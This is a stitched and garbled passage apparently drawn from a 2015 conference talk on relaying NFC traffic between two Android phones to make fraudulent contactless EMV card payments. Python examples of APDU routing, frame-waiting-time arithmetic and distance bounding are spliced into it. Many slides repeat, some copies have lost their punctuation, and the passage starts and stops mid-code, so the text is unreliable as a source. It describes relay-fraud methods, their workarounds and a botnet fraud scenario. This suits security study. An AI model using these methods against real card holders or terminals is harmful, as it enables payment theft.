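        self.table[bytes.fromhex(aid_hex)] = service

    def route(self, raw: bytes) -> Optional[str]:
        """Name of the service that would receive this APDU, or None."""
        cmd = parse_apdu(raw)
        aid = selected_aid(cmd)
        if aid is None:                       # not a SELECT: stays with the
            return self.current               # currently selected service
        self.current = self.table.get(aid)    # unknown AID: nothing delivered
        return self.current


# Constructed test vectors (hex strings).
PPSE_AID_HEX = "325041592E5359532E4444463031"          # "2PAY.SYS.DDF01"
UNKNOWN_AID_HEX = "F0112233445566"                    # constructed, not a real AID
SELECT_PPSE = bytes.fromhex("00A404000E" + PPSE_AID_HEX + "00")
SELECT_UNKNOWN = bytes.fromhex("00A4040007" + UNKNOWN_AID_HEX + "00")
GET_PROCESSING_OPTIONS = bytes.fromhex("80A80000028300" + "00")


def demo() -> List[Optional[str]]:
    """Route four APDUs through a table that only knows the PPSE AID."""
    router = AidRouter()
    router.register(PPSE_AID_HEX, "ppse-service")
    return [
        router.route(SELECT_PPSE),             # "ppse-service"
        router.route(GET_PROCESSING_OPTIONS),  # "ppse-service" (same session)
        router.route(SELECT_UNKNOWN),          # None: AID not declared
        router.route(GET_PROCESSING_OPTIONS),  # None: no service selected
    ]


if __name__ == "__main__":
    print(demo())
```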

Android and NFC: A Tale of L♥ve (V)
Digging into the Android NFC stack – Summary

Description                                          Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)    Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)        C, C++        Manufacturer                Yes
NFC Android kernel driver                            C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)     ARM Thumb     Hardware and manufacturer   No

Some useful links:
  https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
  https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
  https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
  https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
  http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
  http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
  http://www.datasheet4u.com/PDF/845670/BCM20793S.html
  http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1
The dishonest verifier communicates with a MIFARE Classic
  libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
    Caused by the CRC computation performed by the NFCC
    Overcome only if the NFCC is modified
  EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant, so this limitation does not affect them

Limitation 2
The dishonest prover communicates with an honest verifier: device in HCE mode
  The AID must be known in advance
    Overcome only if the device is rooted
    The Xposed framework may help to overcome this issue, but needs root permissions

Android and NFC: A Tale of L♥ve (VII)
Some remarkable limitations and remarks

Limitation 3
The dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time as
    FWT = 256 · (16 / fc) · 2^FWI,  0 ≤ FWI ≤ 14,  where fc = 13.56 MHz
  FWT ∈ [500 µs, 5 s] → a relay is theoretically possible when the delay is ≤ 5 s

Concluding Remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
Any communication involving an APDU-compliant NFC tag (e.g., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice

Relay Attack Implementation (I)
Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
  One constraint: only the dishonest prover must run Android ≥ 4.4

Relay Attack Implementation (II)
Threat Scenarios – Scenario 1

Distributed Mafia Fraud
[Figure: a botmaster connected to several bots]

Relay Attack Implementation (III)
Threat Scenarios – Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms:
  Distance-bounding protocols
    Upper-bound the physical distance using the Round-Trip Time of cryptographic challenge-response messages
  Timing constraints
    Not enforced in current NFC-capable systems
    The protocol itself allows timing extension commands
  Physical countermeasures
    Whitelisting/blacklisting: random UID in HCE mode → unfeasible
    RFID blocking covers
    Physical button/switch activation
    Secondary authentication methods (e.g., on-card fingerprint scanners)
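The FWT formula from Limitation 3 and the "timing constraints" item above, worked through in Python as an added example (not the authors' code): the FWT a card advertises, the S(WTX) extension the protocol allows, and what a reader that enforced these timings strictly would still accept. The constants follow ISO/IEC 14443-4 (fc = 13.56 MHz, 0 ≤ FWI ≤ 14, FWI in the high nibble of ATS byte TB(1), WTXM in 1..59); the TB(1) value and the response delays are constructed inputs, not measurements from the talk.

```python
"""Frame Waiting Time arithmetic from ISO/IEC 14443-4 (Limitation 3 slide).

Added example, not the talk's code. Shows how much of the relay delay a
card's advertised FWT leaves, and how far a waiting-time extension (S(WTX))
widens that window, which is why timing alone is a weak defence unless
strictly enforced.
"""
from typing import Dict

FC_HZ = 13.56e6      # carrier frequency fc
FWI_MAX = 14         # 0 <= FWI <= 14
WTXM_MAX = 59        # S(WTX) multiplier WTXM is in 1..59


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI, as written on the slide."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError("FWI out of range")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwi_from_tb1(tb1: int) -> int:
    """FWI is the high nibble of interface byte TB(1) in the card's ATS."""
    return (tb1 >> 4) & 0x0F


def effective_fwt_seconds(fwi: int, wtxm: int = 1) -> float:
    """Temporary FWT granted by an S(WTX) exchange: FWT * WTXM, capped at the
    FWT for FWI = 14 (the protocol's absolute maximum)."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM out of range")
    return min(fwt_seconds(fwi) * wtxm, fwt_seconds(FWI_MAX))


def response_accepted(delay_s: float, fwi: int, wtxm: int = 1) -> bool:
    """Would a reader that strictly enforced FWT accept a response that
    arrives delay_s seconds after the command?"""
    return delay_s <= effective_fwt_seconds(fwi, wtxm)


def fwt_table_us() -> Dict[int, float]:
    """FWT in microseconds for every legal FWI (302.1 us up to ~4.95 s).
    The slide rounds this range to roughly 500 us .. 5 s."""
    return {fwi: round(fwt_seconds(fwi) * 1e6, 1) for fwi in range(FWI_MAX + 1)}


# Constructed scenario (not measured values).
CARD_TB1 = 0x78          # ATS TB(1): FWI = 7, SFGI = 8
DIRECT_DELAY_S = 0.005   # card in the reader's field answers in 5 ms
RELAY_DELAY_S = 1.2      # same answer relayed over a mobile data link


def demo() -> dict:
    """Compare a direct answer and a relayed one against the advertised FWT."""
    fwi = fwi_from_tb1(CARD_TB1)
    return {
        "fwi": fwi,
        "fwt_ms": round(fwt_seconds(fwi) * 1e3, 2),           # 38.66 ms
        "direct_ok": response_accepted(DIRECT_DELAY_S, fwi),   # True
        "relay_ok": response_accepted(RELAY_DELAY_S, fwi),     # False: 1.2 s > 38.66 ms
        # One S(WTX) with the largest multiplier stretches 38.66 ms to 2.28 s,
        # so the relayed answer is back inside the window.
        "relay_ok_with_wtx": response_accepted(RELAY_DELAY_S, fwi, WTXM_MAX),  # True
        # A card declaring FWI = 14 allows ~4.95 s, the slide's upper bound.
        "relay_ok_fwi_max": response_accepted(RELAY_DELAY_S, FWI_MAX),         # True
    }


if __name__ == "__main__":
    print(demo())
```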

Related Work
On relay attacks

2005-2009: first works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: relay attacks on Android accessing Secure Elements
  A SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device
2014: active relay attacks with custom hardware and custom Android firmware

Several works studied the delay introduced by the relay channel
  Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide

Conclusions (I)

The security of NFC is based on the physical proximity concern
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are on the rise
  They can be abused to interact with cards in their proximity

Conclusions
  Review of the Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attacks may appear before long

Conclusions (II)
But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks on EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León, under contract X43
  HITB staff

And thanks to all of you for listening to us
Visit http://vwzq.net/relaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 3: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 3 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (II)

Wow NFC sounds pretty hipsterTwo main elements

Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)

Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36

Introduction to NFC (III)

ISOIEC 14443 standardFour-part international standard forcontactless smartcards

1 Size physical characteristics etc2 RF power and signalling schemes

(Type A amp B)Half-duplex 106 kbps rate

3 Initialization + anticollision protocol4 Data transmission protocol

IsoDep cards compliant with the fourparts

Example contactless payment cards

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36

Introduction to NFC (IV)

ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards

Application Protocol Data Units (APDUs)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (VI)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36

Introduction to NFC (VII)

Ok So is it secure right Right

If it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
Payment sector is quite interested in this new way for making payments
  500M NFC payment users expected by 2019
  Almost 300 smart phones available at the moment with NFC capabilities
    Check http://www.nfcworld.com/nfc-phones-list/
  Most of them run Android OS

Research Hypothesis
Can a passive relay attack be performed in contactless payment cards using an Android NFC-capable device?
If so, what are the constraints (if any)?

Background (I)
EMV contactless cards

Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
Application ID (AID) command

Background (II)
MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
Amount limit on a single transaction
  Up to £20 GBP, 20€, US$50, 50CHF, CAD$100 or AUD$100
  cof, cof... (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
Sequential contactless payments limited: it asks for the PIN
Protected by the same fraud guarantee as standard transactions (hopefully)

Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)

[Diagram: honest prover P talks to the dishonest verifier V'; a communication link forwards the exchange to the dishonest prover P', which talks to the honest verifier V]

Real-time fraud where a fraudulent prover P' and verifier V' cooperate
Honest prover and verifier: contactless card and Point-of-Sale terminal
Dishonest prover and verifier: two NFC-enabled Android devices

Android and NFC: A Tale of L♥ve (I)
Recap on evolution of Android NFC support

[Figure: timeline of the NFC operation modes supported by each Android release (software reader/writer, peer-to-peer and card-emulation; hardware card-emulation), with the tag technology classes added at each step]

Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
Android CyanogenMod OS 9.1 (thanks to Doug Yeager): IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
Android 4.2 Jelly Bean (API level 17): NfcBarcode
Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II)
Digging into Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on built-in NFC chip): libnfc-nxp, libnfc-nci
NXP dropped in favour of NCI
  Open architecture, not focused on a single chip family
  Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  Standard proposed by NFC Forum

Android and NFC: A Tale of L♥ve (III)
Digging into Android NFC stack: Reader/Writer mode

Not allowed to be set directly → handled through an Android activity
Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing: General Kernel Interface (GKI)
  Makes communication between layers and modules easier

[Diagram: path of a transceive call. User App → NFC developer framework (Tag → NfcService via mTagService.transceive; IPC to TagService; DeviceHost.TagEndPoint <<realize>> NativeNfcTag) → JNI (doTransceive) → System NFC Library (NativeNfcTag.cpp, libnfc-nci)]

Android and NFC: A Tale of L♥ve (IV)
Digging into Android NFC stack: HCE mode

A service must be implemented to process commands and replies
  HostApduService abstract class and processCommandApdu method
AID-based routing service table
  This means you need to declare in advance what AID you handle
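As an added example (written for this page, not code from the authors' app or from Android), the Python below builds and parses the ISO/IEC 7816-4 SELECT-by-AID APDU named on the Background slide and models the AID-based routing table behind HostApduService: a SELECT for a registered AID reaches its handler, any other AID is refused with 6A82 before any host service sees it, which is why the AID has to be declared in advance. The PPSE name is the real EMV value; DEMO_AID, the handlers and every APDU byte string are constructed.

```python
"""Added example, not the authors' app nor Android's own code: ISO/IEC 7816-4
SELECT-by-AID APDUs plus a model of the HCE AID-based routing table described
on the slide (a host service only receives APDUs for an AID it registered in
advance; any other AID gets 6A82). All AIDs and APDU bytes are constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, Optional

SW_OK, SW_WRONG_LENGTH = b"\x90\x00", b"\x67\x00"          # ISO/IEC 7816-4 status words
SW_NOT_ALLOWED, SW_FILE_NOT_FOUND = b"\x69\x85", b"\x6a\x82"
PPSE_AID = b"2PAY.SYS.DDF01"                 # EMV contactless directory name (public value)
DEMO_AID = bytes.fromhex("F0010203040506")   # constructed proprietary AID for the demo
Handler = Callable[["CommandApdu"], bytes]

@dataclass(frozen=True)
class CommandApdu:
    """Short-form command APDU: CLA INS P1 P2 [Lc data] [Le]."""
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes = b""
    le: Optional[int] = None

    def to_bytes(self) -> bytes:
        out = bytes([self.cla, self.ins, self.p1, self.p2])
        if self.data:
            out += bytes([len(self.data)]) + self.data
        return out if self.le is None else out + bytes([self.le])

    @classmethod
    def parse(cls, raw: bytes) -> "CommandApdu":
        """Decode APDU cases 1-4; raise ValueError on malformed input."""
        if len(raw) < 4:
            raise ValueError("APDU header needs 4 bytes")
        cla, ins, p1, p2 = raw[:4]
        body = raw[4:]
        if len(body) <= 1:                        # case 1 (no body) or case 2 (Le only)
            return cls(cla, ins, p1, p2, b"", body[0] if body else None)
        lc, data, rest = body[0], body[1:1 + body[0]], body[1 + body[0]:]
        if len(data) != lc or len(rest) > 1:
            raise ValueError("Lc/Le do not match the body length")
        return cls(cla, ins, p1, p2, data, rest[0] if rest else None)  # cases 3 and 4

    def is_select_by_aid(self) -> bool:
        return self.ins == 0xA4 and self.p1 == 0x04   # SELECT by DF name

def select_by_aid(aid: bytes) -> CommandApdu:
    """The explicit SELECT the slides refer to (CLA 00, INS A4, P1 04, P2 00)."""
    return CommandApdu(0x00, 0xA4, 0x04, 0x00, aid, 0x00)

def tlv(tag: bytes, value: bytes) -> bytes:
    """BER-TLV with short or one-byte long-form (0x81) length; value <= 255 bytes."""
    length = bytes([len(value)]) if len(value) < 0x80 else b"\x81" + bytes([len(value)])
    return tag + length + value

def ppse_handler(apdu: CommandApdu) -> bytes:
    """FCI for the PPSE: one directory entry (tag 61) advertising DEMO_AID, priority 1."""
    entry = tlv(b"\x61", tlv(b"\x4f", DEMO_AID) + tlv(b"\x87", b"\x01"))
    fci = tlv(b"\x6f", tlv(b"\x84", PPSE_AID) + tlv(b"\xa5", tlv(b"\xbf\x0c", entry)))
    return fci + SW_OK

class AidRouter:
    """Models the AID routing table: only registered AIDs reach a host handler."""

    def __init__(self) -> None:
        self._table: Dict[bytes, Handler] = {}
        self._selected: Optional[bytes] = None

    def register(self, aid: bytes, handler: Handler) -> None:
        if not 5 <= len(aid) <= 16:
            raise ValueError("an AID is 5 to 16 bytes long (ISO/IEC 7816-4)")
        self._table[aid] = handler

    def dispatch(self, raw: bytes) -> bytes:
        """Route one command APDU; return response data followed by the status word."""
        try:
            apdu = CommandApdu.parse(raw)
        except ValueError:
            return SW_WRONG_LENGTH
        if apdu.is_select_by_aid():
            if apdu.data not in self._table:      # unknown AID: no host service sees it
                self._selected = None
                return SW_FILE_NOT_FOUND
            self._selected = apdu.data
        if self._selected is None:                # no application selected yet
            return SW_NOT_ALLOWED
        return self._table[self._selected](apdu)

def demo() -> Dict[str, bytes]:
    """Exercise the router with a known, an unknown and a malformed SELECT."""
    router = AidRouter()
    router.register(PPSE_AID, ppse_handler)
    router.register(DEMO_AID, lambda apdu: SW_OK)     # constructed payment applet stub
    return {
        "ppse": router.dispatch(select_by_aid(PPSE_AID).to_bytes()),
        "known": router.dispatch(select_by_aid(DEMO_AID).to_bytes()),
        "unknown": router.dispatch(select_by_aid(bytes.fromhex("F0AABBCCDD")).to_bytes()),
        "malformed": router.dispatch(b"\x00\xa4\x04"),
    }
```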

Android and NFC: A Tale of L♥ve (V)
Digging into Android NFC stack: Summary

Description                                          Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)    Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)        C, C++        Manufacturer                Yes
NFC Android kernel driver                            C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)     ARM Thumb     Hardware and manufacturer   No

Some useful links
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications/
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
  libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
    Caused by the CRC computation performed by the NFCC
    Can be overcome if the NFCC is modified
  EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
  Device in HCE mode
    AID must be known in advance
    Can be overcome if the device is rooted
  Xposed framework may help to overcome this issue, but needs root permissions

Android and NFC: A Tale of L♥ve (VII)
Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
  FWT ∈ [500 µs, 5 s] → relay is theoretically possible when delay is ≤ 5 s

Concluding Remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
Any communication involving an APDU-compliant NFC tag (e.g., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice!
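The Frame Waiting Time formula from Limitation 3, worked through as an added example (not code from the talk): it evaluates FWT for every FWI (the formula gives about 302 µs at FWI = 0 and about 4.95 s at FWI = 14, the sub-millisecond to 5 s band the slide quotes), reads the FWI a card announces in its ATS, and checks a response delay the way a reader that actually enforced FWT would, which is the timing constraint the talk notes is not enforced today. The ATS bytes and both delay values are constructed samples.

```python
"""Added example, not from the talk: the ISO/IEC 14443-4 Frame Waiting Time
formula quoted on the slide, FWT = 256 * (16 / fc) * 2**FWI with fc = 13.56 MHz,
evaluated for every FWI, read out of a (constructed) ATS, and used to check a
response delay the way a reader enforcing FWT strictly would."""
from typing import Dict, Optional

FC_HZ = 13.56e6                 # carrier frequency fc from the slide
FWI_MIN, FWI_MAX = 0, 14        # FWI range from the slide
DEFAULT_FWI = 4                 # ISO/IEC 14443-4 default when TB(1) is absent from the ATS


def fwt_seconds(fwi: int) -> float:
    """FWT for one FWI value; FWI=0 gives ~302 us, FWI=14 gives ~4.95 s."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in [{FWI_MIN}, {FWI_MAX}]")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_table() -> Dict[int, float]:
    """All 15 FWT values in milliseconds, rounded to 3 decimals, for inspection."""
    return {fwi: round(fwt_seconds(fwi) * 1e3, 3) for fwi in range(FWI_MIN, FWI_MAX + 1)}


def fwi_from_ats(ats: bytes) -> int:
    """Read FWI from an ATS: T0 bit 0x20 says TB(1) is present and FWI is its upper
    nibble; interface bytes follow T0 in the order TA(1), TB(1), TC(1)."""
    if len(ats) < 2 or ats[0] != len(ats):
        raise ValueError("malformed ATS (TL must equal the ATS length)")
    t0 = ats[1]
    if not t0 & 0x20:
        return DEFAULT_FWI
    index = 2 + (1 if t0 & 0x10 else 0)         # skip TA(1) when it is present
    if index >= len(ats):
        raise ValueError("ATS announces TB(1) but is too short")
    return ats[index] >> 4


def reader_accepts(delay_s: float, fwi: int) -> bool:
    """True when a response arriving delay_s after the command is within the card's FWT."""
    return delay_s <= fwt_seconds(fwi)


def smallest_fwi_tolerating(delay_s: float) -> Optional[int]:
    """Smallest FWI whose FWT covers delay_s, or None if even FWI=14 does not.
    A reader can treat an unusually large announced FWI as a warning sign."""
    for fwi in range(FWI_MIN, FWI_MAX + 1):
        if delay_s <= fwt_seconds(fwi):
            return fwi
    return None


# Constructed ATS: TL=06, T0=75 (TA, TB, TC present; FSCI=5), TA=77,
# TB=81 (FWI=8, SFGI=1), TC=02, one historical byte.
SAMPLE_ATS = bytes.fromhex("067577810280")
# Constructed delays: a card answering directly versus the same exchange
# forwarded over a mobile network hop.
DIRECT_DELAY_S = 0.002
RELAYED_DELAY_S = 0.250


def demo() -> Dict[str, object]:
    fwi = fwi_from_ats(SAMPLE_ATS)
    return {
        "fwi": fwi,
        "fwt_ms": round(fwt_seconds(fwi) * 1e3, 3),
        "direct_ok": reader_accepts(DIRECT_DELAY_S, fwi),
        "relayed_ok": reader_accepts(RELAYED_DELAY_S, fwi),
        "fwi_covering_relayed_delay": smallest_fwi_tolerating(RELAYED_DELAY_S),
    }
```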

Relay Attack Implementation (I)
Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
One constraint only: dishonest prover must run Android ≥ 4.4

Relay Attack Implementation (II)
Threat Scenarios: Scenario 1

Distributed Mafia Fraud
[Figure: a BOTMASTER coordinating several BOTs]

Relay Attack Implementation (III)
Threat Scenarios: Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms
Distance-bounding protocols
  Upper bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
Timing constraints
  Not enforced in current NFC-capable systems
  The protocol itself allows timing extension commands
Physical countermeasures
  Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  RFID blocking covers
  Physical button/switch activation
  Secondary authentication methods (e.g., on-card fingerprint scanners)
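The distance-bounding idea on this slide, as an added simulation (not code from the talk or any deployed scheme): a verifier in the terminal role and a prover in the card role share a key, derive two response registers from a nonce exchange, and run rapid single-bit challenge rounds; the verifier accepts only if every bit is right and every round-trip time is within its bound, so a relay hop that adds milliseconds fails on timing even though it forwards every bit correctly. Round-trip times are simulated from a link delay plus processing time, and the key, delays and max_rtt value are constructed parameters, not figures from the talk.

```python
"""Added example, not from the talk: a simulated distance-bounding protocol in
the style of Hancke and Kuhn (2005), the resistant mechanism the slide names.
Verifier (terminal role) and prover (card role) share a key; after a nonce
exchange both derive two response registers from HMAC-SHA256 and the verifier
runs rapid single-bit challenge rounds, accepting only if every answer is
correct AND every round-trip time is within max_rtt_s. Round-trip times are
simulated (link delay + processing), not measured; max_rtt_s, the key and the
delays are hypothetical parameters chosen for the demo."""
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

ROUNDS = 32


def derive_registers(key: bytes, nv: bytes, np_: bytes) -> Tuple[bytes, bytes]:
    """Two 128-bit response registers R0 and R1 bound to both nonces."""
    digest = hmac.new(key, nv + np_, hashlib.sha256).digest()
    return digest[:16], digest[16:]


def bit(register: bytes, i: int) -> int:
    return (register[i // 8] >> (7 - i % 8)) & 1


class Prover:
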